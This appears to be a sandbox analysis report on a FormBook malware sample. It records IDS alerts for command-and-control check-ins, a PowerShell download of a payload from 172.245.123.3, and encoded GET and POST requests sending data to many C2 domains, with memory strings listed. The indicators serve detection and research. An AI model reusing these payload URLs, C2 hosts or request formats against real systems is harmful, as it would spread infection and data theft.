                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 162.213.249.216:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 162.213.249.216:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 62.149.128.40:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 62.149.128.40:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50009 -> 162.213.249.216:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50022 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 62.149.128.40:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 199.115.230.222:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 199.115.230.222:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50018 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 154.82.100.177:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50026 -> 154.82.100.177:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 154.82.100.177:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50031 -> 199.115.230.222:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 199.115.230.222:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50013 -> 62.149.128.40:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 154.82.100.177:80
                  Source: DNS query: www.yu12345.xyz
                  Source: global trafficHTTP traffic detected: GET /784/CAMRRAM.txt HTTP/1.1Host: 172.245.123.3Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
                  Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_05117A18 URLDownloadToFileW,3_2_05117A18
                  Source: global trafficHTTP traffic detected: GET /784/verygreattrafficwithniceworkingskilltobegood.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.3Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /gbk4/?Jr=tnaxxtx&ZrE=Xcz/lKtmYzaclw33ohiXS7QV/Se8Pq+n4C+TPx5KwIQWTY7xXXdhlW/5Nf4u3/jcsrURWrDv59TKoDO7PIpn/ZUTTTwXyUNiXs6DylNi2YpMPJOOA+G6DJ3d/zRep1m17eaWMwM= HTTP/1.1Host: www.inastra.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aj1a/?ZrE=Ur0ZWyFT8OiEfJLk5CDxNCd7dngJ/nUOC6gmTkbLwRlGrqwEpeuL3mntSz3wGsXywBh/uITd5DD6tXUqWwiKdOlO+GKC/0z5L+tJCqOb0hSd3y/0vLqXRKaQtaaTWzJkNrBKAAI=&Jr=tnaxxtx HTTP/1.1Host: www.ortenckt.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /dlcs/?ZrE=w6QiAdP8awPLsa7eBVc39wzje3KOivPaseEO6V4cXiHKOPXUCZsKQLVdGPqPnVEzm93wkYEJdOAjyg/exCmJYaQq4xVLxeGT88y8VuPgcLQNhWCgEoW6IBmijKvaz1FJHcFNtNE=&Jr=tnaxxtx HTTP/1.1Host: www.ks1x7i.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /j82t/?ZrE=NfWXDnAQh5K3pnOvM14VTy+amnJPckA/Yfv/BKk9TV5fOF3SI/PjO3S5UMxnHoxUaRbUJGZsTsQcLMza5Yog8fRAodWufvWEXO0cDD2ch1ehULAsaf2d9mbkKApg9S+Ve9CxlSo=&Jr=tnaxxtx HTTP/1.1Host: www.aaavvejibej.bondAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /lrgf/?ZrE=hLl6Iyyv1/RGmZWnRJ8bmiMJmTP6dhK4gm2wi1fTCYCBRK5IakRwGOHrv3dZYUH5yIXieuiAG/czDQPLmWqEbLilSzY96+fF8eVAog2wOE9edOY1dT6GtuOhq9bHDkAhjeaZiB4=&Jr=tnaxxtx HTTP/1.1Host: www.deikamalaharris.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /vfa8/?ZrE=yTDEjSVS0lCRYcLIcrIR3TcCYEVKOYUzZB0jcnDiZYtjnJOoqq5Z+2u71ELG2uGtiKDGExTS3yLoYSdFQgyUiMInkJIsAAFuKMZReKrfZcHWOCruByZu1/Jk+op4CslnIJH3FWE=&Jr=tnaxxtx HTTP/1.1Host: www.tophcom.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCXFZjhm4RzxlyIFmCbk02gBov1+7TAel+jFtI3CD3Jdw5DP3HME6qP+mS3NVD/GMMnbyFe0QVN3VaJo=&Jr=tnaxxtx HTTP/1.1Host: www.chalet-tofane.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /566f/?ZrE=81geMJs5jQmVeK4hwDBPKHBGvn0Tm7ZwgeOmc9jTU6Fy38DzzGnJ98DUeY7D2pyu2XwXZT+7XMaW7aMNMrEzQeD/F7FTjsbI9QNHnkd6Arn6dVLur5eWw9nVs6w/1EYvnvYCbSs=&Jr=tnaxxtx HTTP/1.1Host: www.healthyloveforall.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /tkmh/?Jr=tnaxxtx&ZrE=xPv3ed6Vo6P/OeD+soQOKhGtpyHDw/FO+ter//brXKVYevLLhvaYsARGwIBiS273ToVNwXlIv9TeCbPJyvYOrdDnTudDZaU/k/ECAD12ggB+I5+8DAynmnMMiOBcr//QwqdtWEY= HTTP/1.1Host: www.asiapartnars.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /mnl8/?ZrE=RGOQJd/YEggQptEich3q6d0bfn/irFBnx+ZpwzxB5TUNCs3vZOAWTRyo0cim1/zDkhtz3OYESkByNsQcxwF9aubDKJHPAYECM7rOvY9yH/ydWUGi/0eSoW1GLP2ssLvhhZDeTZQ=&Jr=tnaxxtx HTTP/1.1Host: www.yu12345.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /e3vj/?Jr=tnaxxtx&ZrE=Apw/qEhkM9PBzv16DC8g1MSIQhvVD2Vj01FPVXV4CfqJVQ1J3uaJteAUq9BD3RYf6FzZ09NLBogJcHSO0hmFge+YoOQSOFa9DG3d+S6Zcyz3+NwsM7PgNDQLFA8HvIbfdwoJPYw= HTTP/1.1Host: www.qmmkl.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                  Source: global trafficDNS traffic detected: DNS query: www.inastra.online
                  Source: global trafficDNS traffic detected: DNS query: www.ortenckt.online
                  Source: global trafficDNS traffic detected: DNS query: www.ks1x7i.vip
                  Source: global trafficDNS traffic detected: DNS query: www.aaavvejibej.bond
                  Source: global trafficDNS traffic detected: DNS query: www.deikamalaharris.info
                  Source: global trafficDNS traffic detected: DNS query: www.tophcom.online
                  Source: global trafficDNS traffic detected: DNS query: www.chalet-tofane.net
                  Source: global trafficDNS traffic detected: DNS query: www.healthyloveforall.net
                  Source: global trafficDNS traffic detected: DNS query: www.asiapartnars.online
                  Source: global trafficDNS traffic detected: DNS query: www.yu12345.xyz
                  Source: global trafficDNS traffic detected: DNS query: www.qmmkl.buzz
                  Source: unknownHTTP traffic detected: POST /aj1a/ HTTP/1.1Host: www.ortenckt.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.ortenckt.onlineConnection: closeCache-Control: no-cacheContent-Length: 208Content-Type: application/x-www-form-urlencodedReferer: http://www.ortenckt.online/aj1a/User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 5a 72 45 3d 5a 70 63 35 56 46 39 37 30 4a 47 76 53 37 6a 4f 75 44 6e 66 50 31 6c 62 65 58 46 4e 33 52 77 31 4a 71 6f 41 54 31 76 78 76 68 42 46 31 74 45 7a 6f 4a 36 43 38 57 6e 58 55 67 2f 32 49 34 54 78 2f 68 46 39 34 63 4c 70 78 47 75 6c 68 53 4a 36 63 43 2b 61 55 65 4e 71 32 79 4b 6d 79 47 54 4e 4d 36 6f 39 56 2b 57 2b 74 52 4b 6a 31 55 4f 57 6e 65 6d 44 53 71 36 4e 70 4c 33 33 64 41 49 39 62 4e 67 73 49 33 4f 58 36 77 48 70 71 31 4d 79 34 6c 51 72 67 69 6e 63 2b 58 4b 32 61 65 72 6c 64 75 72 2b 4e 33 77 34 39 6e 55 68 32 4f 39 41 44 4c 55 63 51 4a 64 2b 6e 49 31 51 5a 48 43 31 41 68 35 55 59 53 35 31 32 68 54 42 Data Ascii: ZrE=Zpc5VF970JGvS7jOuDnfP1lbeXFN3Rw1JqoAT1vxvhBF1tEzoJ6C8WnXUg/2I4Tx/hF94cLpxGulhSJ6cC+aUeNq2yKmyGTNM6o9V+W+tRKj1UOWnemDSq6NpL33dAI9bNgsI3OX6wHpq1My4lQrginc+XK2aerldur+N3w49nUh2O9ADLUcQJd+nI1QZHC1Ah5UYS512hTB
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 05 Dec 2024 04:39:48 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rI0tjnFbErdmpJUS4HVz9oEnNtVL6kmpe84qPBaC2ALKfYYXqbdRoCOLm368heIrmkoOSuspmpYY4DXYhB6sDk9nGLRYunOi%2BQAeDyNIXLKTcVi7LYJ0GnHxxKPJT11rJOKlOHo64g%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ed15abbb8778c45-EWR
                    server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1800&rtt_var=900&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=552&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 05 Dec 2024 04:40:09 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 05 Dec 2024 04:40:12 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 05 Dec 2024 04:40:15 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 05 Dec 2024 04:40:18 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                    Cache-Control: private
                    Content-Type: text/html; charset=utf-8
                    Server: Microsoft-IIS/10.0
                    X-Powered-By: ASP.NET
                    Date: Thu, 05 Dec 2024 04:40:25 GMT
                    Connection: close
                    Content-Length: 4953
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                    Cache-Control: private
                    Content-Type: text/html; charset=utf-8
                    Server: Microsoft-IIS/10.0
                    X-Powered-By: ASP.NET
                    Date: Thu, 05 Dec 2024 04:40:27 GMT
                    Connection: close
                    Content-Length: 4953
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                    Cache-Control: private
                    Content-Type: text/html; charset=utf-8
                    Server: Microsoft-IIS/10.0
                    X-Powered-By: ASP.NET
                    Date: Thu, 05 Dec 2024 04:40:30 GMT
                    Connection: close
                    Content-Length: 4953
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 404 Not Found
                    Cache-Control: private
                    Content-Type: text/html; charset=utf-8
                    Server: Microsoft-IIS/10.0
                    X-Powered-By: ASP.NET
                    Date: Thu, 05 Dec 2024 04:40:33 GMT
                    Connection: close
                    Content-Length: 5109
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005692000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.3/784/verygre
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005692000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIF
                  Source: powershell.exe, 00000003.00000002.2196881592.000000000322D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIFM
                  Source: powershell.exe, 00000003.00000002.2196881592.000000000322D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIFa
                  Source: powershell.exe, 00000003.00000002.2201238458.00000000079BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2439851510.000000000324C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
                  Source: powershell.exe, 00000008.00000002.2474478084.0000000007755000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
                  Source: powershell.exe, 00000003.00000002.2201321954.0000000007A57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmp
                  Strings found in binary or memory (each reported for all four sources above):
                    http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                    http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                    http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                    http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                    http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                    http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                    http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                    http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                    http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                    http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                    http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                    http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                    http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                    http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                    http://i1.cdn-image.com/__media__/js/min.js?v2.3
                    http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                    http://i1.cdn-image.com/__media__/pics/28903/search.png)
                    http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
                    http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
                    http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                  Source: powershell.exe, 00000008.00000002.2474478084.0000000007755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coX
                  Source: powershell.exe, 00000003.00000002.2199749880.0000000006336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000003.00000002.2198089199.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.Inastra.online
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000054F0000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000005B50000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.chalet-tofane.net:80/obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCX
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/2019_Toyota_Land_Cruiser.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEX
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Opel_Astra.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2F
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Toyota_Avensis.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK8
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Toyota_F1.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2Fl
